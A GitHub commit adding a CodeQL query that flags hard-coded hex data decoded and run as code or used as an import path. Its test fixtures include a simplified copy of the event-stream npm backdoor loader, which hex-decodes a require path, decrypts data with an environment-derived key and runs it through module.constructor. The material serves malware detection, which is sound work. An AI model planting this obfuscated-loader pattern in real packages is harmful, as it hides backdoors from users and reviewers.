Skip to content

Commit 5f16406

Browse files
author
Max Schaefer
committed
JavaScript: Add new query HardcodedDataInterpretedAsCode.
1 parent 94a5722 commit 5f16406

File tree

11 files changed

+231
-0
lines changed

11 files changed

+231
-0
lines changed

change-notes/1.19/analysis-javascript.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -23,6 +23,7 @@
2323
|-----------------------------------------------|------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
2424
| Enabling Node.js integration for Electron web content renderers (`js/enabling-electron-renderer-node-integration`) | security, frameworks/electron, external/cwe/cwe-094 | Highlights Electron web content renderer preferences with Node.js integration enabled, indicating a violation of [CWE-94](https://cwe.mitre.org/data/definitions/94.html). Results are not shown on LGTM by default. |
2525
| File data in outbound network request | security, external/cwe/cwe-200 | Highlights locations where file data is sent in a network request. Results are not shown on LGTM by default. |
26+
| Hard-coded data interpreted as code | security, external/cwe/cwe-506 | Highlights locations where hard-coded data is transformed and then executed as code or interpreted as an import path, which may indicate embedded malicious code ([CWE-506](https://cwe.mitre.org/data/definitions/506.html)). Results are shown on LGTM by default. |
2627
| Host header poisoning in email generation | security, external/cwe/cwe-640 | Highlights code that generates emails with links that can be hijacked by HTTP host header poisoning, indicating a violation of [CWE-640](https://cwe.mitre.org/data/definitions/640.html). Results shown on LGTM by default. |
2728
| Unsafe dynamic method access (`js/unsafe-dynamic-method-access` ) | security, external/cwe/cwe-094 | Highlights code that invokes a user-controlled method on an object with unsafe methods. Results are shown on LGTM by default. |
2829
| Replacement of a substring with itself (`js/identity-replacement`) | correctness, security, external/cwe/cwe-116 | Highlights string replacements that replace a string with itself, which usually indicates a mistake. Results shown on LGTM by default. |

javascript/config/suites/javascript/security

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -20,6 +20,7 @@
2020
+ semmlecode-javascript-queries/Security/CWE-352/MissingCsrfMiddleware.ql: /Security/CWE/CWE-352
2121
+ semmlecode-javascript-queries/Security/CWE-400/RemotePropertyInjection.ql: /Security/CWE/CWE-400
2222
+ semmlecode-javascript-queries/Security/CWE-502/UnsafeDeserialization.ql: /Security/CWE/CWE-502
23+
+ semmlecode-javascript-queries/Security/CWE-506/HardcodedDataInterpretedAsCode.ql: /Security/CWE/CWE-506
2324
+ semmlecode-javascript-queries/Security/CWE-601/ClientSideUrlRedirect.ql: /Security/CWE/CWE-601
2425
+ semmlecode-javascript-queries/Security/CWE-601/ServerSideUrlRedirect.ql: /Security/CWE/CWE-601
2526
+ semmlecode-javascript-queries/Security/CWE-611/Xxe.ql: /Security/CWE/CWE-611
Lines changed: 46 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,46 @@
1+
<!DOCTYPE qhelp PUBLIC "-//Semmle//qhelp//EN" "qhelp.dtd">
2+
<qhelp>
3+
4+
<overview>
5+
<p>
6+
Interpreting hard-coded data, such as string literals containing hexadecimal numbers,
7+
as code or as an import path is typical of malicious backdoor code that has been
8+
implanted into an otherwise trusted code base and is trying to hide its true purpose
9+
from casual readers or automated scanning tools.
10+
</p>
11+
</overview>
12+
13+
<recommendation>
14+
<p>
15+
Examine the code in question carefully to ascertain its provenance and its true purpose.
16+
If the code is benign, it should always be possible to rewrite it without relying
17+
on dynamically interpreting data as code, improving both clarity and safety.
18+
</p>
19+
</recommendation>
20+
21+
<example>
22+
<p>
23+
As an example of malicious code using this obfuscation technique, consider the following
24+
simplified version of a snippet of backdoor code that was discovered in a dependency of
25+
the popular <code>event-stream</code> npm package:
26+
</p>
27+
<sample src="examples/HardcodedDataInterpretedAsCode.js"/>
28+
<p>
29+
While this shows only the first few lines of code, it already looks very suspicious
30+
since it takes a hard-coded string literal, hex-decodes it and then uses it as an
31+
import path. The only reason to do so is to hide the name of the file being imported.
32+
</p>
33+
</example>
34+
35+
<references>
36+
<li>
37+
OWASP:
38+
<a href="https://www.owasp.org/index.php/Trojan_Horse">Trojan Horse</a>.
39+
</li>
40+
<li>
41+
The npm Blog:
42+
<a href="https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident">Details about the event-stream incident</a>.
43+
</li>
44+
</references>
45+
46+
</qhelp>
Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
/**
2+
* @name Hard-coded data interpreted as code
3+
* @description Transforming hard-coded data (such as hexadecimal constants) into code
4+
* to be executed is a technique often associated with backdoors and should
5+
* be avoided.
6+
* @kind path-problem
7+
* @problem.severity error
8+
* @precision medium
9+
* @id js/hardcoded-data-interpreted-as-code
10+
* @tags security
11+
* external/cwe/cwe-506
12+
*/
13+
14+
import javascript
15+
import semmle.javascript.security.dataflow.HardcodedDataInterpretedAsCode::HardcodedDataInterpretedAsCode
16+
import DataFlow::PathGraph
17+
18+
from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink
19+
where cfg.hasFlowPath(source, sink)
20+
select sink.getNode(), source, sink,
21+
"Hard-coded data from $@ is interpreted as " + sink.getNode().(Sink).getKind() + ".",
22+
source.getNode(), "here"
Lines changed: 8 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,8 @@
1+
var r = require;
2+
3+
function e(r) {
4+
return Buffer.from(r, "hex").toString()
5+
}
6+
7+
// BAD: hexadecimal constant decoded and interpreted as import path
8+
var n = r(e("2e2f746573742f64617461"));
Lines changed: 94 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,94 @@
1+
/**
2+
* Provides a taint-tracking configuration for reasoning about hard-coded data
3+
* being interpreted as code.
4+
*/
5+
6+
import javascript
7+
private import semmle.javascript.security.dataflow.CodeInjection
8+
9+
module HardcodedDataInterpretedAsCode {
10+
/**
11+
* A data flow source for hard-coded data.
12+
*/
13+
abstract class Source extends DataFlow::Node {
14+
/** Gets a flow label for which this is a source. */
15+
DataFlow::FlowLabel getLabel() {
16+
result = DataFlow::FlowLabel::data()
17+
}
18+
}
19+
20+
/**
21+
* A data flow sink for code injection.
22+
*/
23+
abstract class Sink extends DataFlow::Node {
24+
/** Gets a flow label for which this is a sink. */
25+
abstract DataFlow::FlowLabel getLabel();
26+
27+
/** Gets a description of what kind of sink this is. */
28+
abstract string getKind();
29+
}
30+
31+
/**
32+
* A sanitizer for hard-coded data.
33+
*/
34+
abstract class Sanitizer extends DataFlow::Node {}
35+
36+
/**
37+
* A taint-tracking configuration for reasoning about hard-coded data
38+
* being interpreted as code
39+
*/
40+
class Configuration extends TaintTracking::Configuration {
41+
Configuration() {
42+
this = "HardcodedDataInterpretedAsCode"
43+
}
44+
45+
override predicate isSource(DataFlow::Node source, DataFlow::FlowLabel lbl) {
46+
source.(Source).getLabel() = lbl
47+
}
48+
49+
override predicate isSink(DataFlow::Node nd, DataFlow::FlowLabel lbl) {
50+
nd.(Sink).getLabel() = lbl
51+
}
52+
53+
override predicate isSanitizer(DataFlow::Node node) {
54+
super.isSanitizer(node) or
55+
node instanceof Sanitizer
56+
}
57+
}
58+
59+
/**
60+
* A constant string consisting of eight or more hexadecimal characters, viewed
61+
* as a source of hard-coded data that should not be interpreted as code.
62+
*/
63+
private class DefaultSource extends Source, DataFlow::ValueNode {
64+
DefaultSource() {
65+
astNode.(Expr).getStringValue().regexpMatch("[0-9a-fA-F]{8,}")
66+
}
67+
}
68+
69+
/**
70+
* A code injection sink; hard-coded data should not flow here.
71+
*/
72+
private class DefaultCodeInjectionSink extends Sink {
73+
DefaultCodeInjectionSink() { this instanceof CodeInjection::Sink }
74+
override DataFlow::FlowLabel getLabel() { result = DataFlow::FlowLabel::taint() }
75+
override string getKind() { result = "code" }
76+
}
77+
78+
/**
79+
* An argument to `require` path; hard-coded data should not flow here.
80+
*/
81+
private class RequireArgumentSink extends Sink {
82+
RequireArgumentSink() {
83+
this = any(Require r).getAnArgument().flow()
84+
}
85+
86+
override DataFlow::FlowLabel getLabel() {
87+
result = DataFlow::FlowLabel::data()
88+
or
89+
result = DataFlow::FlowLabel::taint()
90+
}
91+
92+
override string getKind() { result = "an import path" }
93+
}
94+
}
Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
nodes
2+
| event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
3+
| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" |
4+
| event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
5+
| event-stream.js:9:13:9:36 | "2e2f74 ... 617461" |
6+
| tst.js:1:29:1:88 | '636f6e ... 6e2729' |
7+
| tst.js:2:6:2:46 | Buffer. ... 'hex') |
8+
| tst.js:2:6:2:57 | Buffer. ... tring() |
9+
| tst.js:2:18:2:38 | totally ... sString |
10+
| tst.js:5:12:5:23 | "0123456789" |
11+
| tst.js:7:8:7:11 | test |
12+
| tst.js:7:8:7:15 | test+"n" |
13+
edges
14+
| event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") |
15+
| event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | event-stream.js:9:11:9:37 | e("2e2f ... 17461") |
16+
| tst.js:1:29:1:88 | '636f6e ... 6e2729' | tst.js:2:18:2:38 | totally ... sString |
17+
| tst.js:2:6:2:46 | Buffer. ... 'hex') | tst.js:2:6:2:57 | Buffer. ... tring() |
18+
| tst.js:2:18:2:38 | totally ... sString | tst.js:2:6:2:46 | Buffer. ... 'hex') |
19+
| tst.js:5:12:5:23 | "0123456789" | tst.js:7:8:7:11 | test |
20+
| tst.js:7:8:7:11 | test | tst.js:7:8:7:15 | test+"n" |
21+
#select
22+
| event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") | event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | event-stream-orig.js:2:1113:2:1139 | e("2e2f ... 17461") | Hard-coded data from $@ is interpreted as an import path. | event-stream-orig.js:2:1115:2:1138 | "2e2f74 ... 617461" | here |
23+
| event-stream.js:9:11:9:37 | e("2e2f ... 17461") | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | event-stream.js:9:11:9:37 | e("2e2f ... 17461") | Hard-coded data from $@ is interpreted as an import path. | event-stream.js:9:13:9:36 | "2e2f74 ... 617461" | here |
24+
| tst.js:2:6:2:57 | Buffer. ... tring() | tst.js:1:29:1:88 | '636f6e ... 6e2729' | tst.js:2:6:2:57 | Buffer. ... tring() | Hard-coded data from $@ is interpreted as code. | tst.js:1:29:1:88 | '636f6e ... 6e2729' | here |
25+
| tst.js:7:8:7:15 | test+"n" | tst.js:5:12:5:23 | "0123456789" | tst.js:7:8:7:15 | test+"n" | Hard-coded data from $@ is interpreted as code. | tst.js:5:12:5:23 | "0123456789" | here |
Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Security/CWE-506/HardcodedDataInterpretedAsCode.ql

javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js

Lines changed: 2 additions & 0 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.
Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
// Based on https://github.com/dominictarr/event-stream/issues/116
2+
3+
var r = require, t = process;
4+
5+
function e(r) {
6+
return Buffer.from(r, "hex").toString()
7+
}
8+
9+
var n = r(e("2e2f746573742f64617461")),
10+
o = t[e(n[3])][e(n[4])];
11+
12+
if (!o) return;
13+
14+
var u = r(e(n[2]))[e(n[6])](e(n[5]), o);
15+
a += u.final(e(n[9]));
16+
17+
var f = new module.constructor;
18+
f.paths = module.paths;
19+
f[e(n[7])](a, "");
20+
f.exports(n[1]);

0 commit comments

Comments
 (0)